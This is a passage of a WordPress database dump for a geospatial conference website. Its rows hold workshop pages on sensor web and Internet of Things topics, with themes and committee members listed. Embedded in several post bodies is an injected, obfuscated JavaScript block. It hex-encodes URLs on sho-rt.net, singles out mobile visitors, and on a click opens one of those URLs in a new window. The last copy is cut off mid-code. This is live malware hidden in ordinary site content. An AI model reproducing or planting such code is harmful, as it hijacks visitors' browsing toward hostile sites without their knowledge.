Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Advanced Data Preparation and Data Management for Geospatial and Remote Sensing Scenarios</strong>','','inherit','closed','closed','','2993-revision-v1','','','2022-12-05 05:02:00','2022-12-05 05:02:00','',2993,'https://gsw2023.com/?p=3385',0,'revision','',0),
(3386,1,'2022-12-06 04:37:29','2022-12-06 04:37:29','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3396\" img_size=\"600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]<!-- /wp:paragraph --></p>\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>Intelligent Systems in Sensor Web and Internet of Things</strong></span></h5>\n<h5 class=\"fancy-subtitle start-animation-done start-animation\" style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>Organized by ISPRS WG IV/7</strong></span></h5>\n<p>&nbsp;</p>\n<h5 style=\"text-align: justify; color: black;\">This workshop aims at discussing the advancement of open standards, methods, algorithms, and systems that are related to sensor web, internet of things (IoT), crowdsourcing, and intelligent systems to support human decision and planning, facilitate knowledge-aware digital twins, and improve governance of smart cities. We welcome papers that address the above <u>from a geospatial perspective</u>, as well as aspects beyond technologies, i.e., social and organizational issues related to the real-time use and citizen trustiness of data obtained from sensors, IoT devices, and crowdsourcing.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"blue\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><strong>CHAIRS</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" resized_image_dimensions=\"6x8\" img_max_width=\"80px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"61\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5><strong>Themes of Event</strong></h5>\n<ul>\n<li><strong>Fusion and integration of data from sensors, IoT devices, and crowd sources for supporting digital twins and smart cities.</strong></li>\n<li><strong>New methods and techniques (e.g., machine learning and deep learning based, decentralized processing, and edge computing) for analyzing, predicting, and simulating data from sensors, IoT devices, and crowd sources.</strong></li>\n<li><strong>Research on ethical use of and trust in data from ubiquitous sensors, IoT devices, crowdsourcing, and intelligent systems.</strong></li>\n<li><strong>Potential of sensor web, Internet of Things, crowdsourcing, participatory and intelligent systems for user-centered planning and decision support, situational awareness and emergency management.</strong></li>\n<li><strong>Efficient use of the data from sensors, IoT devices, crowdsourcing, and intelligent/participatory systems for supporting the implementation of UNs’ SDGs.</strong></li>\n</ul>\n<p>&nbsp;</p>\n<h5><strong>Scientific Committee</strong></h5>\n<p>Dr. Maria Antonia Brovelli - Politecnico di Milano, Italy</p>\n<p>Dr. Cidália Costa Fonte - University of Coimbra, Portugal</p>\n<p>Dr. Chih-Yuan Huang - National Central University, Chinese Taibei</p>\n<p>Dr. Changfeng Jing - China University of Geosciences, China</p>\n<p>Dr. Marguerite Madden - University of Georgia, USA</p>\n<p>Dr. Marco Minghini - European Commission – Joint Research Centre, Italy</p>\n<p>Dr. Dev Raj Paudyal - University of Southern Queensland, Australia</p>\n<p>Dr. Mingshu Wang - University of Glasgow, UK</p>\n<p>Dr. Vasil Yordanov - Politecnico di Milano, Italy</p>\n<p>Dr. Ana-Maria Raimond - LASTIG laboratory, University Gustave Eiffel - IGN/ENSG, France</p>\n<p>Dr. Steve Liang - University of Calgary, Canada[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Intelligent Systems in<a> Sensor Web and Internet of Things</a></strong>','','publish','closed','closed','','intelligent-systems-in-sensor-web-and-internet-of-things','','','2023-03-07 11:38:34','2023-03-07 11:38:34','',0,'https://gsw2023.com/?post_type=dt_portfolio&#038;p=3386',0,'dt_portfolio','',0),
(3387,1,'2022-12-06 04:36:53','2022-12-06 04:36:53','','ws23','','inherit','open','closed','','ws23','','','2022-12-06 04:36:53','2022-12-06 04:36:53','',3386,'https://gsw2023.com/wp-content/uploads/2022/12/ws23.jpg',0,'attachment','image/jpeg',0),
(3388,1,'2022-12-06 04:37:29','2022-12-06 04:37:29','<!-- wp:paragraph -->\n<p>Organized by ISPRS WG IV/7</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const 